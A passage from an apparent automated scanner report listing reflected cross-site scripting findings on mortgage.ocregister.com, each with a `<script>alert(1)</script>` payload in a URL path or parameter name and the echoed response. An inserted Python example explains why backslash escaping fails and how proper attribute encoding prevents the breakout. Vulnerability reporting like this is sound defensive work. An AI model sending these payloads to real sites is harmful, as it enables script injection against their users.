User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010cb8f1\"><script>alert(1)</script>d0a62076da8/11/feed/" />
...[SNIP]...

1.349. http://mortgage.ocregister.com/2010/11/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/11/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b677c"><script>alert(1)</script>be838dc77bd was submitted in the REST URL parameter 2. This input was echoed as b677c\"><script>alert(1)</script>be838dc77bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11b677c"><script>alert(1)</script>be838dc77bd/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:17 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/11b677c\"><script>alert(1)</script>be838dc77bd/feed/" />
...[SNIP]...

1.350. http://mortgage.ocregister.com/2010/11/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/11/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbb71"><script>alert(1)</script>e8fe4cf5fe1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fbb71\"><script>alert(1)</script>e8fe4cf5fe1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/?fbb71"><script>alert(1)</script>e8fe4cf5fe1=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2010 November - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/11/?fbb71\"><script>alert(1)</script>e8fe4cf5fe1=1feed/" />
...[SNIP]...
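The following is an added example, not part of the scanner report or the site's code. It takes the reflection seen in findings 1.348 (path segment) and 1.350 (query-parameter name) and runs the reflected markup through an HTML parser to show why the backslash-escaped quote does not stop the breakout, what correct attribute encoding looks like, and why exploitability through a normal browser link still has to be confirmed. The template model (render_feed_link, request URI plus "feed/" dropped into a double-quoted href) and the addslashes() behaviour are assumptions inferred from the report; the request targets and the reflected <link> tag are copied from the findings above.

```python
"""Does a reflected payload really break out of a double-quoted HTML attribute?

Added example, not the site's code.  render_feed_link() and addslashes() model
what the report suggests the vulnerable page does; they are assumptions.
"""
import html
from html.parser import HTMLParser
from urllib.parse import quote

HOST = "http://mortgage.ocregister.com"

# Request targets copied from findings 1.348 and 1.350 (scanner sent them raw).
PATH_URI = '/2010cb8f1"><script>alert(1)</script>d0a62076da8/11/'
QUERY_URI = '/2010/11/?fbb71"><script>alert(1)</script>e8fe4cf5fe1=1'

# The reflected <link> tag exactly as it appears in the 1.348 response body.
REPORTED_1_348 = (
    '<link rel="alternate" type="application/rss+xml" '
    'title=" Page not found - Mortgage Insider - www.ocregister.com" '
    'href="http://mortgage.ocregister.com/2010cb8f1\\"><script>alert(1)'
    '</script>d0a62076da8/11/feed/" />'
)


def addslashes(value: str) -> str:
    """Mimic PHP addslashes()/magic_quotes_gpc: backslash before ', " and \\."""
    return (value.replace("\\", "\\\\")
                 .replace('"', '\\"')
                 .replace("'", "\\'"))


def escape_attr(value: str) -> str:
    """Correct output encoding for an attribute value: " -> &quot;, < -> &lt;,
    > -> &gt;, so the value can never terminate the attribute or the tag."""
    return html.escape(value, quote=True)


def identity(value: str) -> str:
    """No output encoding at all."""
    return value


def browser_encoded(request_uri: str) -> str:
    """What a browser actually puts on the request line: the quote and angle
    brackets are percent-encoded; URI structure characters are kept."""
    return quote(request_uri, safe="/?=&")


def render_feed_link(request_uri: str, escape=addslashes) -> str:
    """Hypothetical model of the vulnerable template (an assumption): request
    URI + 'feed/' dropped into a double-quoted href after `escape`."""
    href = escape(HOST + request_uri + "feed/")
    return ('<link rel="alternate" type="application/rss+xml" '
            'title=" Mortgage Insider - www.ocregister.com" href="%s" />' % href)


class StartTagCollector(HTMLParser):
    """Record the start tags a browser-side parser sees, in document order,
    plus the href the first <link> tag ends up with."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.link_href = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "link" and self.link_href is None:
            self.link_href = dict(attrs).get("href")


def parse(markup: str) -> StartTagCollector:
    p = StartTagCollector()
    p.feed(markup)
    p.close()
    return p


def script_breaks_out(markup: str) -> bool:
    """True when the payload left the href attribute and became a <script>
    element; False when it stayed inside the attribute value."""
    return "script" in parse(markup).tags


if __name__ == "__main__":
    for label, uri in (("path", PATH_URI), ("query", QUERY_URI)):
        print(label, "addslashes :", script_breaks_out(render_feed_link(uri, addslashes)))
        print(label, "html.escape:", script_breaks_out(render_feed_link(uri, escape_attr)))
        print(label, "raw, browser-encoded:",
              script_breaks_out(render_feed_link(browser_encoded(uri), identity)))
```

The backslash case and the completely unencoded case both yield a <script> start tag, because the parser ends the attribute at the first unencoded quote. With html.escape(quote=True) the full URI, payload included, survives as one href value and no script element appears. The last check is the caveat: if the browser's percent-encoded form is echoed without server-side decoding, there is no quote in the response and no breakout, which is what to verify against the live application before classifying the issue as exploitable through a link.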

1.351. http://mortgage.ocregister.com/2010/12/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/12/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbe7d"><script>alert(1)</script>9448cd28c6b was submitted in the REST URL parameter 1. This input was echoed as dbe7d\"><script>alert(1)</script>9448cd28c6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010dbe7d"><script>alert(1)</script>9448cd28c6b/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010dbe7d\"><script>alert(1)</script>9448cd28c6b/12/feed/" />
...[SNIP]...

1.352. http://mortgage.ocregister.com/2010/12/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/12/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbf92"><script>alert(1)</script>76f411482be was submitted in the REST URL parameter 2. This input was echoed as bbf92\"><script>alert(1)</script>76f411482be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/12bbf92"><script>alert(1)</script>76f411482be/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/12bbf92\"><script>alert(1)</script>76f411482be/feed/" />
...[SNIP]...

1.353. http://mortgage.ocregister.com/2010/12/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/12/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a315"><script>alert(1)</script>fc303a44594 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3a315\"><script>alert(1)</script>fc303a44594 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/12/?3a315"><script>alert(1)</script>fc303a44594=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 116006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2010 December - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/12/?3a315\"><script>alert(1)</script>fc303a44594=1feed/" />
...[SNIP]...

1.354. http://mortgage.ocregister.com/2011/01/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4cbf"><script>alert(1)</script>bf63c84bd54 was submitted in the REST URL parameter 1. This input was echoed as d4cbf\"><script>alert(1)</script>bf63c84bd54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011d4cbf"><script>alert(1)</script>bf63c84bd54/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011d4cbf\"><script>alert(1)</script>bf63c84bd54/01/feed/" />
...[SNIP]...

1.355. http://mortgage.ocregister.com/2011/01/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eafb"><script>alert(1)</script>e74c7ede1c7 was submitted in the REST URL parameter 2. This input was echoed as 6eafb\"><script>alert(1)</script>e74c7ede1c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/016eafb"><script>alert(1)</script>e74c7ede1c7/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:03 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/016eafb\"><script>alert(1)</script>e74c7ede1c7/feed/" />
...[SNIP]...

1.356. http://mortgage.ocregister.com/2011/01/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6821d"><script>alert(1)</script>a9bdec31fc9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6821d\"><script>alert(1)</script>a9bdec31fc9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/?6821d"><script>alert(1)</script>a9bdec31fc9=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 100078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2011 January - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/?6821d\"><script>alert(1)</script>a9bdec31fc9=1feed/" />
...[SNIP]...

1.357. http://mortgage.ocregister.com/2011/01/08/upside-down-but-still-on-a-good-path/41162/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/08/upside-down-but-still-on-a-good-path/41162/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf68d"><script>alert(1)</script>b4fa67ceb86 was submitted in the REST URL parameter 5. This input was echoed as cf68d\"><script>alert(1)</script>b4fa67ceb86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/08/upside-down-but-still-on-a-good-path/41162cf68d"><script>alert(1)</script>b4fa67ceb86/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:10:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:10:02 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
nk rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/08/upside-down-but-still-on-a-good-path/41162cf68d\"><script>alert(1)</script>b4fa67ceb86/feed/" />
...[SNIP]...

1.358. http://mortgage.ocregister.com/2011/01/08/upside-down-but-still-on-a-good-path/41162/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/08/upside-down-but-still-on-a-good-path/41162/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a165b"><script>alert(1)</script>757581a972c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a165b\"><script>alert(1)</script>757581a972c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/08/upside-down-but-still-on-a-good-path/41162/?a165b"><script>alert(1)</script>757581a972c=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41162>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77227


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
"application/rss+xml" title=" Upside down but still on a good path - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/08/upside-down-but-still-on-a-good-path/41162/?a165b\"><script>alert(1)</script>757581a972c=1feed/" />
...[SNIP]...

1.359. http://mortgage.ocregister.com/2011/01/13/late-o-c-mortgage-payments-drop/41334/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/13/late-o-c-mortgage-payments-drop/41334/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2896b"><script>alert(1)</script>20b18d9fc89 was submitted in the REST URL parameter 5. This input was echoed as 2896b\"><script>alert(1)</script>20b18d9fc89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/13/late-o-c-mortgage-payments-drop/413342896b"><script>alert(1)</script>20b18d9fc89/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:09:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:57 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/13/late-o-c-mortgage-payments-drop/413342896b\"><script>alert(1)</script>20b18d9fc89/feed/" />
...[SNIP]...

1.360. http://mortgage.ocregister.com/2011/01/13/late-o-c-mortgage-payments-drop/41334/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/13/late-o-c-mortgage-payments-drop/41334/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30dce"><script>alert(1)</script>046932d1455 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 30dce\"><script>alert(1)</script>046932d1455 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/13/late-o-c-mortgage-payments-drop/41334/?30dce"><script>alert(1)</script>046932d1455=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
